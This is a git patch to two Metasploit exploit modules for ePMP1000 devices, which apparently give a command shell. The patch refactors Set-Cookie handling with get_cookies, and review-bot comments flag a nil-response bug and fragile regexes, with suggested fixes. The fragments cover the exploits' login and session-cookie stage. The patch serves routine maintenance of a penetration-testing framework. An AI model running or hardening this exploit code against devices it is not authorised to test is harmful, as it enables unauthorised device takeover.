From 7b386ea2c8a4e2de94f5aa99f996800bdb925fe6 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Tue, 19 Dec 2017 06:58:23 -0800 Subject: [PATCH] Fix msftidy warnings wrt Set-Cookie --- .../linux/http/epmp1000_get_chart_cmd_shell.rb | 11 ++++++----- .../exploits/linux/http/epmp1000_ping_cmd_shell.rb | 14 +++++++------- 2 files changed, 13 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb b/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb index 99563f011f..9520f489dc 100644 --- a/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb +++ b/modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb @@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && - res.headers['Set-Cookie'].include?('sysauth') + cookies.include?('sysauth') ) if good_response - sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value = cookies.match(/((.*)[$ ])/) cookie1 = "#{sysauth_value}" prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/) @@ -158,10 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && + !cookies.blank? && !res.body.include?('auth_failed') && !res.body.include?('Maximum number of users reached.') ) @@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") # get the cookie now - sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value_2 = cookies.match(/((.*)[$ ])/) stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/) stok_value_2 = "#{stok_value_2_dirty}".split('"')[3] final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}" 
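Review bot: `cookies = res.get_cookies` now runs before the `res &&` test inside `good_response`, so a request that returns no response (nil `res`) raises NoMethodError here instead of the condition evaluating false. The removed `res.headers[...]` checks sat behind `res &&` and could not fail that way. Guard the assignment, e.g. `cookies = res ? res.get_cookies : ''`. The same ordering appears in the second hunk of this file (`@@ -158,10 +158,11 @@`) and in both login hunks of epmp1000_ping_cmd_shell.rb. The enclosing method starts and ends outside the hunk.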
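Review bot: `cookies.match(/((.*)[$ ])/)` in the `@@ -170,7 +171,7 @@` hunk keeps a pattern written for the raw header: inside a character class `$` is a literal dollar sign, so the match succeeds only if the string contains a space or `$`, and then runs greedily to the last one. `get_cookies` returns a rebuilt cookie string rather than the raw `Set-Cookie` value, so it should be verified that such a character is still present. If it is not, `sysauth_value_2` is nil and is interpolated into `final_cookie` as an empty string without any error. Selecting the cookie by name, e.g. `cookies[/sysauth[^;]*;?\s?/]`, and treating a nil result as a failed login would make the dependency explicit. The same expression assigns `sysauth_value` in the first hunk of this file and in two hunks of epmp1000_ping_cmd_shell.rb.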
diff --git a/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb b/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb index 1764f1c8fb..403bb75972 100644 --- a/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb +++ b/modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb @@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && - res.headers['Set-Cookie'].include?('sysauth') + cookies.include?('sysauth') ) if good_response - sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value = cookies.match(/((.*)[$ ])/) cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D" @@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote } ) + cookies = res.get_cookies good_response = ( res && res.code == 200 && - res.headers.include?('Set-Cookie') && - res.headers['Set-Cookie'].include?('stok=') && + cookies.include?('stok=') && !res.body.include?('Maximum number of users reached.') ) @@ -169,9 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") # get the cookie now - get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/) + get_stok = cookies.match(/stok=(.*)/) stok_value = get_stok[1] - sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) + sysauth_value = cookies.match(/((.*)[$ ])/) final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}" # create config_uri
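Review bot: `cookies.match(/stok=(.*)/)` in the `@@ -169,9 +169,9 @@` hunk captures greedily to the end of the string, so `stok_value` carries whatever follows the token in the string `get_cookies` returns (a trailing `;`, or further cookies if stok is not last). That was already true of the raw header, but the input format changes with this commit and the value is appended to `final_cookie` unchecked. Bounding the capture keeps only the token: `stok_value = cookies[/stok=([^;\s]+)/, 1]`. The enclosing method continues outside the hunk.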